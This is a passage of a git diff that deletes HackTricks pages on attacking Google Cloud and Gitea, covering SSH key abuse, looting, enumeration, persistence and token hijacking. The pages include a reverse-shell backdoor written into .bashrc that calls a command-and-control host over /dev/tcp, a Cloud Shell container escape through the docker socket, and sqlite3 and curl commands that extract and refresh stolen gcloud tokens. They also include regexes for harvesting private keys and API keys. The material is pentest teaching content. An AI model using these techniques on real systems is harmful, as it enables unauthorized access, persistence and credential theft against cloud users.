key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods. - -## SSH keys at project level - -Following the details mentioned in the previous section you can try to compromise more VMs. - -We can expand upon those a bit by [**applying SSH keys at the project level**](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to **SSH into a privileged account** for any instance that has not explicitly chosen the "Block project-wide SSH keys" option.: - -``` -gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt -``` - -If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. - -# **Using OS Login** - -[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. - -OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. - -OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. - -The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: - -* **compute.instances.osLogin** (no sudo) -* **compute.instances.osAdminLogin** (has sudo) - -Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. - -If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. - -Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. - -# Search for Keys in the filesystem - -It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. - -First, find what `gcloud` config directories exist in users' home folders. - -``` -sudo find / -name "gcloud" -``` - -You can manually inspect the files inside, but these are generally the ones with the secrets: - -* \~/.config/gcloud/credentials.db -* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json -* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto -* \~/.credentials.json - -Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you. - -## More API Keys regexes - -```bash -TARGET_DIR="/path/to/whatever" - -# Service account keys -grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \ - "$TARGET_DIR" - -# Legacy GCP creds -grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \ - "$TARGET_DIR" - -# Google API keys -grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \ - "$TARGET_DIR" - -# Google OAuth tokens -grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \ - "$TARGET_DIR" - -# Generic SSH keys -grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \ - "$TARGET_DIR" - -# Signed storage URLs -grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \ - "$TARGET_DIR" - -# Signed policy documents in HTML -grep -Pzr '(?s)
' \ - "$TARGET_DIR" -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-looting.md b/cloud-security/gcp-security/gcp-looting.md deleted file mode 100644 index 118849f0b..000000000 --- a/cloud-security/gcp-security/gcp-looting.md +++ /dev/null @@ -1,158 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Stackdriver logging - -[Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite which might be capturing sensitive information like syslog-like capabilities that report individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more. - -The service account for a Compute Instance **only needs WRIT**E access to enable logging on instance actions, **but** an administrator may **mistakenly** **grant** the service account both **READ** and WRITE access. If this is the case, you can explore logs for sensitive data. - -[gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) provides tools to get this done. First, you'll want to see what types of logs are available in your current project. - -```bash -# List logs -gcloud logging logs list -NAME -projects/REDACTED/logs/OSConfigAgent -projects/REDACTED/logs/cloudaudit.googleapis.com%2Factivity -projects/REDACTED/logs/cloudaudit.googleapis.com%2Fsystem_event -projects/REDACTED/logs/bash.history -projects/REDACTED/logs/compute.googleapis.com -projects/REDACTED/logs/compute.googleapis.com%2Factivity_log - -# Read logs -gcloud logging read [FOLDER] - -# Write logs -# An attacker writing logs may confuse the Blue Team -gcloud logging write [FOLDER] [MESSAGE] -``` - -# AI platform configurations - -Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects. - -There are a few areas here you can look for interesting information - models and jobs. Try the following commands. - -``` -$ gcloud ai-platform models list --format=json -$ gcloud ai-platform jobs list --format=json -``` - -# Cloud pub/sub - -Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed by the message content and some metadata). - -```bash -# Get a list of topics in the project -gcloud pubsub topics list - -# Get a list of subscriptions across all topics -gcloud pubsub subscriptions list --format=json - -# This will retrive a non ACKed message (and won't ACK it) -gcloud pubsub subscriptions pull [SUBSCRIPTION NAME] -``` - -However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing. - -# Cloud Git repositories - -Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications. - -You can explore the available repositories with the following commands: - -```bash -# enumerate what's available -gcloud source repos list - -# clone a repo locally -gcloud source repos clone [REPO NAME] -``` - -# Cloud Filestore Instances - -Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository -** a potential source of sensitive info. - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. - -``` -gcloud filestore instances list --format=json -``` - -# Containers - -```bash -gcloud container images list -gcloud container subnets list -gcloud container clusters list -gcloud container clusters get-credentials [NAME] - -# Run a container locally -docker run --rm -ti gcr.io//secret:v1 sh -``` - -# Kubernetes - -First, you can check to see if any Kubernetes clusters exist in your project. - -``` -gcloud container clusters list -``` - -If you do have a cluster, you can have `gcloud` automatically configure your `~/.kube/config` file. This file is used to authenticate you when you use [kubectl](https://kubernetes.io/docs/reference/kubectl/overview/), the native CLI for interacting with K8s clusters. Try this command. - -``` -gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION] -``` - -Then, take a look at the `~/.kube/config` file to see the generated credentials. This file will be used to automatically refresh access tokens based on the same identity that your active `gcloud` session is using. This of course requires the correct permissions in place. - -Once this is set up, you can try the following command to get the cluster configuration. - -``` -kubectl cluster-info -``` - -You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/). - -This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-network-enumeration.md b/cloud-security/gcp-security/gcp-network-enumeration.md deleted file mode 100644 index 8706f21d4..000000000 --- a/cloud-security/gcp-security/gcp-network-enumeration.md +++ /dev/null @@ -1,57 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Network Enumeration - -## Compute - -```bash -# List networks -gcloud compute networks list -gcloud compute networks describe - -# List subnetworks -gcloud compute networks subnets list -gcloud compute networks subnets get-iam-policy --region -gcloud compute networks subnets describe --region - -# List FW rules in networks -gcloud compute firewall-rules list -``` - -You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-persistance.md b/cloud-security/gcp-security/gcp-persistance.md deleted file mode 100644 index ef90744cc..000000000 --- a/cloud-security/gcp-security/gcp-persistance.md +++ /dev/null @@ -1,141 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment. - -# OS Patching -If you gain access to a service account (either through credentials or by a default service account on a compute instance/cloud function) if it has the `osconfig.patchDeployments.create` permission you can create a [patch deployment](https://cloud.google.com/compute/docs/os-patch-management#patch_deployment_overview). This deployment will run a script on Windows and Linux compute instances at a defined interval under the context of the [OS Config agent](https://cloud.google.com/compute/docs/os-patch-management#how_os_patch_management_works). - -Automated tooling such as [patchy]( https://github.com/rek7/patchy) exists to detect and exploit the presence of lax permissions on a compute instance or cloud function. - -If you want to manually install the patch deployment run the following gcloud command, a patch boiler plate can be found [here](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json): - -`gcloud compute os-config patch-deployments create my-update --file=patch.json` - -# Google’s Cloud Shell - -## Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance. -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There is **no capabilities for an organisation to monitor** the activity of that instance. - -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell everytime it's run just by doing: - -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` - -## Container Escape - -Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing: - -```bash -sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest -sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest -sudo docker -H unix:///google/host/var/run/docker.sock start escaper -sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh -``` - -This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env. - -Moreover, notice that from the host you can find a service account token: - -```bash -wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" -default/ -vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ -``` - -With the following scopes: - -```bash -wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes" -https://www.googleapis.com/auth/logging.write -https://www.googleapis.com/auth/monitoring.write -``` - -# Token Hijacking - -## Authenticated User - -If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticated and independently on the machine you use his tokens from and even if the user has MFA configured. - -This is because by default you **will be able to use the refresh token as long** as you want to generate new tokens. - -To get the current token of a user you can run: - -```bash -sqlite3 ./.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='';" -``` - -To get the details to generate a new access token run: - -```bash -sqlite3 ./.config/gcloud/credentials.db "select value from credentials where account_id='';" -``` - -To get a new refreshed access token with the refresh token, client ID, and client secret run: - -```bash -curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token -``` - -## Service Accounts - -Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\ -However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**. - -## Metadata - -Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes). - -## Remediations - -Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) - -# References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1) -* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md b/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md deleted file mode 100644 index 7cd15b400..000000000 --- a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md +++ /dev/null @@ -1,191 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Cloud Functions - -Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code. - -```bash -# List functions -gcloud functions list - -# Get function config including env variables -gcloud functions describe [FUNCTION NAME] - -# Get logs of previous runs -# By default, limits to 10 lines -gcloud functions logs read [FUNCTION NAME] --limit [NUMBER] -``` - -## Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $func" - fi - done -done - -``` - -# App Engine Configurations - -Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows: - -```bash -# First, get a list of all available versions of all services -gcloud app versions list - -# Then, get the specific details on a given app -gcloud app describe [APP] -``` - -# Cloud Run Configurations - -Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. - -The access to this web server might be public of managed via IAM permissions: - -```bash -# First get a list of services across the available platforms -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# To learn more, export as JSON and investigate what the services do -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Attempt to trigger a job unauthenticated -curl [URL] - -# Attempt to trigger a job with your current gcloud authorization -curl -H \ - "Authorization: Bearer $(gcloud auth print-identity-token)" \ - [URL] -``` - -## Enumerate Open CloudRun - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done - -``` - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gitea-security/README.md b/cloud-security/gitea-security/README.md deleted file mode 100644 index 9813f9de5..000000000 --- a/cloud-security/gitea-security/README.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# What is Gitea - -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. - -![](<../../.gitbook/assets/image (655).png>) - -## Basic Information - -{% content-ref url="basic-gitea-information.md" %} -[basic-gitea-information.md](basic-gitea-information.md) -{% endcontent-ref %} - -# Lab - -To run a Gitea instance locally you can just run a docker container: - -```bash -docker run -p 3000:3000 gitea/gitea -``` - -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - -``` -helm repo add gitea-charts https://dl.gitea.io/charts/ -helm install gitea gitea-charts/gitea -``` - -# Unauthenticated Enumeration - -* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) - -Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. - -# Internal Exploitation - -For this scenario we are going to suppose that you have obtained some access to a github account. - -## With User Credentials/Web Cookie - -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. - -{% hint style="info" %} -Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} - -## With User SSH Key - -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: - -```bash -# Go to the the repository folder -# Get repo config and current user name and email -git config --list -``` - -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. - -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. - -### GPG Keys - -As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: - -```shell -gpg --list-secret-keys --keyid-format=long -``` - -## With User Token - -For an introduction about [**User Tokens check the basic 